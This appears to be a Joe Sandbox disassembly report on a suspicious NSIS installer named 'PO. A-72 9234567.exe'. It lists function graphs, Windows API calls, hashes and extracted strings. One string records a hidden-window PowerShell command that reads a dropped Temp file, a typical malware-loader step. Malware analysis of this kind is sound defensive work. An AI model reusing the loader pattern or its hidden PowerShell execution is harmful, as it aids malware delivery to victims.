                                                  • Part of subcall function 0040689E: FindClose.KERNEL32(00000000), ref: 004068B5
                                                • OleUninitialize.OLE32(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A6C
                                                • ExitProcess.KERNEL32 ref: 00403A89
                                                • CloseHandle.KERNEL32(00000000,0042D000,0042D000,?,0042C800,00000000), ref: 00403A90
                                                • GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403AAC
                                                • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?), ref: 00403AB3
                                                • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403AC8
                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00403AEB
                                                • ExitWindowsEx.USER32(00000002,80040002), ref: 00403B10
                                                • ExitProcess.KERNEL32 ref: 00403B33
                                                  • Part of subcall function 00405AEF: CreateDirectoryW.KERNELBASE(?,00000000,0040350F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00405AF5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2220607284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2220587842.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220624805.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2221154462.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO.jbxd
                                                Similarity
                                                • API ID: File$Process$CloseDirectoryExit$CreateCurrentDeleteEnvironmentFindHandlePathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCommandCopyErrorFirstInfoInitializeLineLookupModeMoveNextOpenPrivilegePrivilegesUninitializeValuelstrcpynwsprintf
                                                • String ID: "C:\Users\user\Desktop\PO. A-72 9234567.exe"$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes$C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\fiskehandels$C:\Users\user\Desktop$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$powershell.exe -windowstyle hidden "$Forvaltningslovens=gc -raw 'C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\re$~nsu%X.tmp
                                                • API String ID: 1813718867-1092123709
                                                • Opcode ID: 9f65d0021fa33c3354d42538bbc8dc08c63897f5b3407e021a3db38cc4d3dfe0
                                                • Instruction ID: b6c3ecddbcec298392be70143bc2b9781a35be0696dc4cb4866b7eddd329dddd
                                                • Opcode Fuzzy Hash: 9f65d0021fa33c3354d42538bbc8dc08c63897f5b3407e021a3db38cc4d3dfe0
                                                • Instruction Fuzzy Hash: A9F12370604311ABD720AF659D05B2B7EE8EF8570AF10483EF481B22D1DB7D9A45CB6E
                                                Function 00405705 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284windowclipboardmemoryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 151 405705-405720 152 405726-4057ed GetDlgItem * 3 call 4044f5 call 404e4e GetClientRect GetSystemMetrics SendMessageW * 2 151->152 153 4058af-4058b6 151->153 174 40580b-40580e 152->174 175 4057ef-405809 SendMessageW * 2 152->175 155 4058e0-4058ed 153->155 156 4058b8-4058da GetDlgItem CreateThread CloseHandle 153->156 158 40590b-405915 155->158 159 4058ef-4058f5 155->159 156->155 163 405917-40591d 158->163 164 40596b-40596f 158->164 161 405930-405939 call 404527 159->161 162 4058f7-405906 ShowWindow * 2 call 4044f5 159->162 171 40593e-405942 161->171 162->158 169 405945-405955 ShowWindow 163->169 170 40591f-40592b call 404499 163->170 164->161 167 405971-405977 164->167 167->161 176 405979-40598c SendMessageW 167->176 172 405965-405966 call 404499 169->172 173 405957-405960 call 4055c6 169->173 170->161 172->164 173->172 180 405810-40581c SendMessageW 174->180 181 40581e-405835 call 4044c0 174->181 175->174 182 405992-4059bd CreatePopupMenu call 40657e AppendMenuW 176->182 183 405a8e-405a90 176->183 180->181 190 405837-40584b ShowWindow 181->190 191 40586b-40588c GetDlgItem SendMessageW 181->191 188 4059d2-4059e7 TrackPopupMenu 182->188 189 4059bf-4059cf GetWindowRect 182->189 183->171 188->183 193 4059ed-405a04 188->193 189->188 194 40585a 190->194 195 40584d-405858 ShowWindow 190->195 191->183 192 405892-4058aa SendMessageW * 2 191->192 192->183 196 405a09-405a24 SendMessageW 193->196 197 405860-405866 call 4044f5 194->197 195->197 196->196 198 405a26-405a49 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 196->198 197->191 200 405a4b-405a72 SendMessageW 198->200 200->200 201 405a74-405a88 GlobalUnlock SetClipboardData CloseClipboard 200->201 201->183
                                                APIs
                                                • GetDlgItem.USER32(?,00000403), ref: 00405763
                                                • GetDlgItem.USER32(?,000003EE), ref: 00405772
                                                • GetClientRect.USER32(?,?), ref: 004057AF
                                                • GetSystemMetrics.USER32(00000002), ref: 004057B6
                                                • SendMessageW.USER32(?,00001061,00000000,?), ref: 004057D7
                                                • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057E8
                                                • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004057FB
                                                • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405809
                                                • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040581C
                                                • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040583E
                                                • ShowWindow.USER32(?,00000008), ref: 00405852
                                                • GetDlgItem.USER32(?,000003EC), ref: 00405873
                                                • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405883
                                                • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040589C
                                                • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004058A8
                                                • GetDlgItem.USER32(?,000003F8), ref: 00405781
                                                  • Part of subcall function 004044F5: SendMessageW.USER32(00000028,?,00000001,00404320), ref: 00404503
                                                • GetDlgItem.USER32(?,000003EC), ref: 004058C5
                                                • CreateThread.KERNELBASE(00000000,00000000,Function_00005699,00000000), ref: 004058D3
                                                • CloseHandle.KERNELBASE(00000000), ref: 004058DA
                                                • ShowWindow.USER32(00000000), ref: 004058FE
                                                • ShowWindow.USER32(?,00000008), ref: 00405903
                                                • ShowWindow.USER32(00000008), ref: 0040594D
                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405981
                                                • CreatePopupMenu.USER32 ref: 00405992
                                                • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004059A6
                                                • GetWindowRect.USER32(?,?), ref: 004059C6
                                                • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059DF
                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A17
                                                • OpenClipboard.USER32(00000000), ref: 00405A27
                                                • EmptyClipboard.USER32 ref: 00405A2D
                                                • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A39
                                                • GlobalLock.KERNEL32(00000000), ref: 00405A43
                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A57
                                                • GlobalUnlock.KERNEL32(00000000), ref: 00405A77
                                                • SetClipboardData.USER32(0000000D,00000000), ref: 00405A82
                                                • CloseClipboard.USER32 ref: 00405A88
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2220607284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2220587842.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220624805.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2221154462.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO.jbxd
                                                Similarity
                                                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                • String ID: {
                                                • API String ID: 590372296-366298937
                                                • Opcode ID: 3824989ea0536e5c3d89d87b24ed579d9185aa06a8fa494c1d573172a0034d7b
                                                • Instruction ID: 1ec4b4c3d0988b91a44b02e8c0f1a80d5eff4bd371306251f5288e66bb296ab7
                                                • Opcode Fuzzy Hash: 3824989ea0536e5c3d89d87b24ed579d9185aa06a8fa494c1d573172a0034d7b
                                                • Instruction Fuzzy Hash: 4FB139B1900608FFDB11AFA0DD89AAE7B79FB04354F40813AFA41B61A0CB744E51DF68
                                                Function 00406C5F Relevance: 5.4, APIs: 4, Instructions: 382COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 667 406c5f-406c64 668 406cd5-406cf3 667->668 669 406c66-406c95 667->669 670 4072cb-4072e0 668->670 671 406c97-406c9a 669->671 672 406c9c-406ca0 669->672 675 4072e2-4072f8 670->675 676 4072fa-407310 670->676 677 406cac-406caf 671->677 673 406ca2-406ca6 672->673 674 406ca8 672->674 673->677 674->677 678 407313-40731a 675->678 676->678 679 406cb1-406cba 677->679 680 406ccd-406cd0 677->680 684 407341-40734d 678->684 685 40731c-407320 678->685 681 406cbc 679->681 682 406cbf-406ccb 679->682 683 406ea2-406ec0 680->683 681->682 688 406d35-406d63 682->688 686 406ec2-406ed6 683->686 687 406ed8-406eea 683->687 694 406ae3-406aec 684->694 689 407326-40733e 685->689 690 4074cf-4074d9 685->690 692 406eed-406ef7 686->692 687->692 695 406d65-406d7d 688->695 696 406d7f-406d99 688->696 689->684 693 4074e5-4074f8 690->693 698 406ef9 692->698 699 406e9a-406ea0 692->699 697 4074fd-407501 693->697 700 406af2 694->700 701 4074fa 694->701 702 406d9c-406da6 695->702 696->702 721 407481-40748b 698->721 722 406e7f-406e97 698->722 699->683 710 406e3e-406e48 699->710 706 406af9-406afd 700->706 707 406c39-406c5a 700->707 708 406b9e-406ba2 700->708 709 406c0e-406c12 700->709 701->697 703 406dac 702->703 704 406d1d-406d23 702->704 727 406d02-406d1a 703->727 728 407469-407473 703->728 717 406dd6-406ddc 704->717 718 406d29-406d2f 704->718 706->693 714 406b03-406b10 706->714 707->670 712 406ba8-406bc1 708->712 713 40744e-407458 708->713 715 406c18-406c2c 709->715 716 40745d-407467 709->716 719 40748d-407497 710->719 720 406e4e-407017 710->720 723 406bc4-406bc8 712->723 713->693 714->701 726 406b16-406b5c 714->726 729 406c2f-406c37 715->729 716->693 724 406e3a 717->724 725 406dde-406dfc 717->725 718->688 718->724 719->693 720->694 721->693 722->699 723->708 731 406bca-406bd0 723->731 724->710 732 406e14-406e26 725->732 733 406dfe-406e12 725->733 734 406b84-406b86 726->734 735 406b5e-406b62 726->735 727->704 728->693 729->707 729->709 736 406bd2-406bd9 731->736 737 406bfa-406c0c 731->737 738 406e29-406e33 732->738 733->738 741 406b94-406b9c 734->741 742 406b88-406b92 734->742 739 406b64-406b67 GlobalFree 735->739 740 406b6d-406b7b GlobalAlloc 735->740 743 406be4-406bf4 GlobalAlloc 736->743 744 406bdb-406bde GlobalFree 736->744 737->729 738->717 745 406e35 738->745 739->740 740->701 746 406b81 740->746 741->723 742->741 742->742 743->701 743->737 744->743 748 407475-40747f 745->748 749 406dbb-406dd3 745->749 746->734 748->693 749->717
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2220607284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2220587842.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220624805.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2221154462.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c61fa70d481ae7decb37dc56cf27f7a4c6ea5b826eb98dd3ad332090416f9cd2
                                                • Instruction ID: db5d81fcbfa5be4a2d8af1487b95e9640f9c883cb1993a3fcb30b22963867ec5
                                                • Opcode Fuzzy Hash: c61fa70d481ae7decb37dc56cf27f7a4c6ea5b826eb98dd3ad332090416f9cd2
                                                • Instruction Fuzzy Hash: 87F17871D04229CBDF28CFA8C8946ADBBB0FF44305F25816ED456BB281D7786A86CF45
                                                Function 0040689E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 786 40689e-4068b2 FindFirstFileW 787 4068b4-4068bd FindClose 786->787 788 4068bf 786->788 789 4068c1-4068c2 787->789 788->789
                                                APIs
                                                • FindFirstFileW.KERNELBASE(?,00425F58,00425710,00405F61,00425710,00425710,00000000,00425710,00425710, 4#v,?,C:\Users\user\AppData\Local\Temp\,00405C6D,?,76233420,C:\Users\user\AppData\Local\Temp\), ref: 004068A9
                                                • FindClose.KERNEL32(00000000), ref: 004068B5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2220607284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2220587842.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220624805.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2221154462.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO.jbxd
                                                Similarity
                                                • API ID: Find$CloseFileFirst
                                                • String ID: X_B
                                                • API String ID: 2295610775-941606717
                                                • Opcode ID: 368a1c0a689282c2aa5195ddf357efb180b92b440bed087baa82a07527058284
                                                • Instruction ID: f67f359cedd367be1f2f51a398ada2a6aadcf11014009cc1af4821528039bb17
                                                • Opcode Fuzzy Hash: 368a1c0a689282c2aa5195ddf357efb180b92b440bed087baa82a07527058284
                                                • Instruction Fuzzy Hash: 68D0123251A5205BC64067396E0C84B7B58AF153717268A36F5AAF21E0CB348C6A969C
                                                Function 00403FC1 Relevance: 51.4, APIs: 34, Instructions: 357windowstringCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 202 403fc1-403fd3 203 403fd9-403fdf 202->203 204 40413a-404149 202->204 203->204 205 403fe5-403fee 203->205 206 404198-4041ad 204->206 207 40414b-404193 GetDlgItem * 2 call 4044c0 SetClassLongW call 40140b 204->207 208 403ff0-403ffd SetWindowPos 205->208 209 404003-40400a 205->209 211 4041ed-4041f2 call 40450c 206->211 212 4041af-4041b2 206->212 207->206 208->209 214 40400c-404026 ShowWindow 209->214 215 40404e-404054 209->215 220 4041f7-404212 211->220 217 4041b4-4041bf call 401389 212->217 218 4041e5-4041e7 212->218 221 404127-404135 call 404527 214->221 222 40402c-40403f GetWindowLongW 214->222 223 404056-404068 DestroyWindow 215->223 224 40406d-404070 215->224 217->218 243 4041c1-4041e0 SendMessageW 217->243 218->211 219 40448d 218->219 231 40448f-404496 219->231 228 404214-404216 call 40140b 220->228 229 40421b-404221 220->229 221->231 222->221 230 404045-404048 ShowWindow 222->230 232 40446a-404470 223->232 234 404072-40407e SetWindowLongW 224->234 235 404083-404089 224->235 228->229 240 404227-404232 229->240 241 40444b-404464 DestroyWindow EndDialog 229->241 230->215 232->219 239 404472-404478 232->239 234->231 235->221 242 40408f-40409e GetDlgItem 235->242 239->219 244 40447a-404483 ShowWindow 239->244 240->241 245 404238-404285 call 40657e call 4044c0 * 3 GetDlgItem 240->245 241->232 246 4040a0-4040b7 SendMessageW IsWindowEnabled 242->246 247 4040bd-4040c0 242->247 243->231 244->219 274 404287-40428c 245->274 275 40428f-4042cb ShowWindow KiUserCallbackDispatcher call 4044e2 EnableWindow 245->275 246->219 246->247 249 4040c2-4040c3 247->249 250 4040c5-4040c8 247->250 251 4040f3-4040f8 call 404499 249->251 252 4040d6-4040db 250->252 253 4040ca-4040d0 250->253 251->221 255 404111-404121 SendMessageW 252->255 257 4040dd-4040e3 252->257 253->255 256 4040d2-4040d4 253->256 255->221 256->251 260 4040e5-4040eb call 40140b 257->260 261 4040fa-404103 call 40140b 257->261 270 4040f1 260->270 261->221 271 404105-40410f 261->271 270->251 271->270 274->275 278 4042d0 275->278 279 4042cd-4042ce 275->279 280 4042d2-404300 GetSystemMenu EnableMenuItem SendMessageW 278->280 279->280 281 404302-404313 SendMessageW 280->281 282 404315 280->282 283 40431b-40435a call 4044f5 call 403fa2 call 406541 lstrlenW call 40657e SetWindowTextW call 401389 281->283 282->283 283->220 294 404360-404362 283->294 294->220 295 404368-40436c 294->295 296 40438b-40439f DestroyWindow 295->296 297 40436e-404374 295->297 296->232 299 4043a5-4043d2 CreateDialogParamW 296->299 297->219 298 40437a-404380 297->298 298->220 300 404386 298->300 299->232 301 4043d8-40442f call 4044c0 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 299->301 300->219 301->219 306 404431-404444 ShowWindow call 40450c 301->306 308 404449 306->308 308->232
                                                APIs
                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FFD
                                                • ShowWindow.USER32(?), ref: 0040401D
                                                • GetWindowLongW.USER32(?,000000F0), ref: 0040402F
                                                • ShowWindow.USER32(?,00000004), ref: 00404048
                                                • DestroyWindow.USER32 ref: 0040405C
                                                • SetWindowLongW.USER32(?,00000000,00000000), ref: 00404075
                                                • GetDlgItem.USER32(?,?), ref: 00404094
                                                • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004040A8
                                                • IsWindowEnabled.USER32(00000000), ref: 004040AF
                                                • GetDlgItem.USER32(?,00000001), ref: 0040415A
                                                • GetDlgItem.USER32(?,00000002), ref: 00404164
                                                • SetClassLongW.USER32(?,000000F2,?), ref: 0040417E
                                                • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004041CF
                                                • GetDlgItem.USER32(?,00000003), ref: 00404275
                                                • ShowWindow.USER32(00000000,?), ref: 00404296
                                                • KiUserCallbackDispatcher.NTDLL(?,?), ref: 004042A8
                                                • EnableWindow.USER32(?,?), ref: 004042C3
                                                • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004042D9
                                                • EnableMenuItem.USER32(00000000), ref: 004042E0
                                                • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004042F8
                                                • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040430B
                                                • lstrlenW.KERNEL32(00422F08,?,00422F08,00000000), ref: 00404335
                                                • SetWindowTextW.USER32(?,00422F08), ref: 00404349
                                                • ShowWindow.USER32(?,0000000A), ref: 0040447D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2220607284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2220587842.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220624805.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2221154462.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO.jbxd
                                                Similarity
                                                • API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                • String ID:
                                                • API String ID: 121052019-0
                                                • Opcode ID: 4b3fe02cb5795506d30df4e66f46237e59566fdbff82c58b44480cf0eb866077
                                                • Instruction ID: f4824fcfb4375dbde2e3aa314f90dcffafac0cdac9d9fdfce080a9e5a5e1030c
                                                • Opcode Fuzzy Hash: 4b3fe02cb5795506d30df4e66f46237e59566fdbff82c58b44480cf0eb866077
                                                • Instruction Fuzzy Hash: E7C1CEB1600200BBCB216F61EE49E2B3A68FB95719F41053EF751B11F0CB795882DB2E
                                                Function 00403C13 Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215stringregistryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 309 403c13-403c2b call 406935 312 403c2d-403c3d call 406488 309->312 313 403c3f-403c76 call 40640f 309->313 322 403c99-403cc2 call 403ee9 call 405f18 312->322 318 403c78-403c89 call 40640f 313->318 319 403c8e-403c94 lstrcatW 313->319 318->319 319->322 327 403d54-403d5c call 405f18 322->327 328 403cc8-403ccd 322->328 334 403d6a-403d8f LoadImageW 327->334 335 403d5e-403d65 call 40657e 327->335 328->327 329 403cd3-403cfb call 40640f 328->329 329->327 336 403cfd-403d01 329->336 338 403e10-403e18 call 40140b 334->338 339 403d91-403dc1 RegisterClassW 334->339 335->334 340 403d13-403d1f lstrlenW 336->340 341 403d03-403d10 call 405e3d 336->341 350 403e22-403e2d call 403ee9 338->350 351 403e1a-403e1d 338->351 342 403dc7-403e0b SystemParametersInfoW CreateWindowExW 339->342 343 403edf 339->343 348 403d21-403d2f lstrcmpiW 340->348 349 403d47-403d4f call 405e10 call 406541 340->349 341->340 342->338 347 403ee1-403ee8 343->347 348->349 354 403d31-403d3b GetFileAttributesW 348->354 349->327 362 403e33-403e4d ShowWindow call 4068c5 350->362 363 403eb6-403eb7 call 405699 350->363 351->347 357 403d41-403d42 call 405e5c 354->357 358 403d3d-403d3f 354->358 357->349 358->349 358->357 370 403e59-403e6b GetClassInfoW 362->370 371 403e4f-403e54 call 4068c5 362->371 366 403ebc-403ebe 363->366 368 403ec0-403ec6 366->368 369 403ed8-403eda call 40140b 366->369 368->351 372 403ecc-403ed3 call 40140b 368->372 369->343 375 403e83-403ea6 DialogBoxParamW call 40140b 370->375 376 403e6d-403e7d GetClassInfoW RegisterClassW 370->376 371->370 372->351 380 403eab-403eb4 call 403b63 375->380 376->375 380->347
                                                APIs
                                                  • Part of subcall function 00406935: GetModuleHandleA.KERNEL32(?,00000020,?,0040362C,0000000C,?,?,?,?,?,?,?,?), ref: 00406947
                                                  • Part of subcall function 00406935: GetProcAddress.KERNEL32(00000000,?), ref: 00406962
                                                • lstrcatW.KERNEL32(1033,00422F08,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F08,00000000,00000002,76233420,C:\Users\user\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\PO. A-72 9234567.exe",00008001), ref: 00403C94
                                                • lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes,1033,00422F08,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F08,00000000,00000002,76233420), ref: 00403D14
                                                • lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes,1033,00422F08,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F08,00000000), ref: 00403D27
                                                • GetFileAttributesW.KERNEL32(: Completed), ref: 00403D32
                                                • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes), ref: 00403D7B
                                                  • Part of subcall function 00406488: wsprintfW.USER32 ref: 00406495
                                                • RegisterClassW.USER32(004289C0), ref: 00403DB8
                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403DD0
                                                • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403E05
                                                • ShowWindow.USER32(00000005,00000000), ref: 00403E3B
                                                • GetClassInfoW.USER32(00000000,RichEdit20W,004289C0), ref: 00403E67
                                                • GetClassInfoW.USER32(00000000,RichEdit,004289C0), ref: 00403E74
                                                • RegisterClassW.USER32(004289C0), ref: 00403E7D
                                                • DialogBoxParamW.USER32(?,00000000,00403FC1,00000000), ref: 00403E9C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2220607284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2220587842.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
